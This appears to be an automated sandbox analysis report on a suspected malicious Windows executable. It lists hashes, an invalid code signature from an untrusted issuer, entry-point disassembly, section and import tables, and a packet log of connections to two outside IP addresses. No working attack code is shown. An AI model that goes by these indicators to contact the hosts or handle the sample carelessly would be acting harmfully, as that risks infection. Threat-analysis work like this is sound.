                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:FRA.0038253.exe
                                                                        File size:587'552 bytes
                                                                        MD5:b07b3994ad66a39937d9081eb64cd5f5
                                                                        SHA1:3fffe0fb2721f440909f99c5cb74d1d556ac45bb
                                                                        SHA256:53501f12261fc6003fb771379846bfc0bad23e331f0ccde984c431c22901881f
                                                                        SHA512:43c7d08528c57467054c69c7d2b007662f618604abb465d92b1118dff290d0cb0bc8b2458ef35ae93fbc4d4b2f5527c298c350fc7743a21eacd548bd5f02d6e5
                                                                        SSDEEP:6144:KcBvWsKG0/FZuK1JnKr4AlEhZmqUH1o0TLIaGWDwiyPAw9RyJqIZRSNQABuX+rVy:nKFZ1exehZmNHKyrwLpaJlZrf+r0
                                                                        TLSH:69C40201F17DC8EAD8B452F38C1EE86031A26E6CA4E1F60E75E23B1D56B3353059B64E
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................d...........3............@
                                                                        Icon Hash:98cc663309010100
                                                                        Entrypoint:0x4033a2
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x660843F1 [Sat Mar 30 16:55:13 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:671f2a1f8aee14d336bab98fea93d734
                                                                        Signature Valid:false
                                                                        Signature Issuer:E=Undercurved@Kuppelen.bl, O=Professionelleste, OU="Torso Samboerne ", CN=Professionelleste, L=Metebach, S=Th\xfcringen, C=DE
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
Not Before:02/03/2024 06:44:54
Not After:02/03/2027 06:44:54
                                                                        Subject Chain
                                                                        • E=Undercurved@Kuppelen.bl, O=Professionelleste, OU="Torso Samboerne ", CN=Professionelleste, L=Metebach, S=Th\xfcringen, C=DE
                                                                        Version:3
                                                                        Thumbprint MD5:EF6A6C58A09B4F796BD7007EEB81795D
                                                                        Thumbprint SHA-1:5EAF3DAA7A9675B3F073379AE20D879B94C27561
                                                                        Thumbprint SHA-256:0E276812D69ACFD0F2973154F311587C966AA67A4A33E05A960BD634DD46E079
                                                                        Serial:066BCF730A6BFE7957DEDAC7727E526A29B7FC1B
                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 00000224h
                                                                        push esi
                                                                        push edi
                                                                        xor edi, edi
                                                                        push 00008001h
                                                                        mov dword ptr [ebp-14h], edi
                                                                        mov dword ptr [ebp-0Ch], 0040A188h
                                                                        mov dword ptr [ebp-08h], edi
                                                                        mov byte ptr [ebp-04h], 00000020h
                                                                        call dword ptr [0040809Ch]
                                                                        mov esi, dword ptr [004080A0h]
                                                                        lea eax, dword ptr [ebp-000000C4h]
                                                                        push eax
                                                                        mov dword ptr [ebp-000000B0h], edi
                                                                        mov dword ptr [ebp-30h], edi
                                                                        mov dword ptr [ebp-2Ch], edi
                                                                        mov dword ptr [ebp-000000C4h], 0000009Ch
                                                                        call esi
                                                                        test eax, eax
                                                                        jne 00007F72B8AA15D1h
                                                                        lea eax, dword ptr [ebp-000000C4h]
                                                                        mov dword ptr [ebp-000000C4h], 00000094h
                                                                        push eax
                                                                        call esi
                                                                        cmp dword ptr [ebp-000000B4h], 02h
                                                                        jne 00007F72B8AA15BCh
                                                                        movsx cx, byte ptr [ebp-000000A3h]
                                                                        mov al, byte ptr [ebp-000000B0h]
                                                                        sub ecx, 30h
                                                                        sub al, 53h
                                                                        mov byte ptr [ebp-2Ah], 00000004h
                                                                        neg al
                                                                        sbb eax, eax
                                                                        not eax
                                                                        and eax, ecx
                                                                        mov word ptr [ebp-30h], ax
                                                                        cmp dword ptr [ebp-000000B4h], 02h
                                                                        jnc 00007F72B8AA15B4h
                                                                        and byte ptr [ebp-2Ah], 00000000h
                                                                        cmp byte ptr [ebp-000000AFh], 00000041h
                                                                        jl 00007F72B8AA15A3h
                                                                        movsx ax, byte ptr [ebp-000000AFh]
                                                                        sub eax, 40h
                                                                        mov word ptr [ebp-30h], ax
                                                                        jmp 00007F72B8AA1596h
                                                                        mov word ptr [ebp-30h], di
                                                                        cmp dword ptr [ebp-000000C0h], 0Ah
                                                                        jnc 00007F72B8AA159Ah
                                                                        and word ptr [ebp+00000000h], 0000h
                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8430 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40000 | 0x1b538 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8e2b0 | 0x1470 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x294 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x628a | 0x6400 | c4a2423b5674bfa0f784f8a541b55665 | False | 0.6612109375 | data | 6.390159547186612 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1234 | 0x1400 | d169790bd6b8e7821b264cddc934c496 | False | 0.4265625 | data | 5.032486821165516 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1a438 | 0x400 | c8ea57e3d910ccbc8ce8b96488c46e9b | False | 0.6474609375 | data | 5.255785049642427 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x1b000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x40000 | 0x1b538 | 0x1b600 | fa34ad7509cc085bd2197e1a639b3094 | False | 0.3632544948630137 | data | 4.846472284247547 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x402f8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.1387229386016799
RT_ICON | 0x50b20 | 0x5d0e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9915624212912434
RT_ICON | 0x56830 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.26047717842323653
RT_ICON | 0x58dd8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.3067542213883677
RT_ICON | 0x59e80 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.37745901639344265
RT_ICON | 0x5a808 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4698581560283688
RT_DIALOG | 0x5ac70 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5ad70 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5ae90 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x5af58 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5afb8 | 0x5a | data | English | United States | 0.7888888888888889
RT_VERSION | 0x5b018 | 0x1e0 | data | English | United States | 0.5354166666666667
RT_MANIFEST | 0x5b1f8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
ole32.dll | OleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
KERNEL32.dll | CreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        May 22, 2024 17:30:30.881201029 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.881376982 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.888591051 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.888761997 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.888768911 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.888942003 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.896106005 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.896343946 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.896354914 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.896507978 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.903316021 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.903464079 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.903472900 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.903619051 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.910553932 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.910883904 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.910906076 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.911494970 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.917651892 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.917957067 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.921351910 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.921565056 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.921575069 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.921772957 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.928534985 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.928844929 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.928854942 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.929065943 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.935765982 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.935998917 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.936022997 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.936250925 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.940309048 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.940558910 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.940582991 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.940850973 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.944742918 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.944987059 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.944996119 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.945203066 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.949222088 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.949445963 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.949455976 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.949657917 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.953726053 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.953967094 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.953990936 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.954195976 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.958101988 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.958343983 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.958353996 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.958544016 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.962487936 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.962702990 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.962729931 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.962910891 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.966836929 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.967130899 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.967140913 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.967358112 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.971070051 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.971308947 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.971319914 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.971534967 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.975302935 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.975542068 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.975552082 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.975739002 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.979592085 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.979831934 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.981570959 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.981760025 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.981769085 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.981982946 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.985800982 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.985977888 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.985987902 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.986162901 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.989897013 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.990124941 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.990134954 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.990304947 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.993943930 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.994213104 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.994223118 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.994436026 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.998034000 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.998243093 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.998254061 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.998475075 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.002034903 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.002260923 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.002273083 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.002484083 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.006009102 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.006241083 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.006258011 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.006458998 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.009941101 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.010191917 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.010205984 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.010376930 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.013864040 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.014136076 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.014151096 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.014367104 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.017577887 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.017831087 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.017853022 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.018069029 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.021446943 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.021653891 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.021672964 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.021900892 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.025079966 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.025299072 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.025317907 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.025532961 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.028740883 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.028949976 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.030653954 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.030858040 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.030877113 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.031058073 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.034280062 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.034630060 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.034651041 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.034863949 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.037862062 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.038062096 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.038080931 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.038281918 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.041568041 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.041789055 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.041807890 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.042068005 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.045001984 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.045229912 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.045248985 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.045458078 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.048572063 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.048785925 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.048804998 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.049006939 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.052063942 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.052290916 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.052309990 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.052520037 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.055635929 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.055866957 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.055887938 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.056092024 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.059106112 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.059315920 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.059339046 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.059578896 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.062585115 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.062786102 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.062809944 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.063024044 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.066056013 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.066349030 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.066359043 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.066570044 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.069462061 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.069703102 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.069714069 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.069921017 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.072880030 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.073168039 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.074604988 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.074829102 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.074839115 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.075042963 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.077727079 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.077941895 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.077950954 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.078171015 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.081088066 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.081325054 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.081335068 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.081533909 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.084269047 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.084472895 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.084496975 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.084707975 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.087469101 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.087626934 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.087675095 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.087879896 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.090679884 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.090894938 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.090904951 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.091108084 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:31.093926907 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:31.094194889 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:33:03.482276917 CEST8049813203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:33:03.482422113 CEST4981380192.168.11.30203.161.49.193
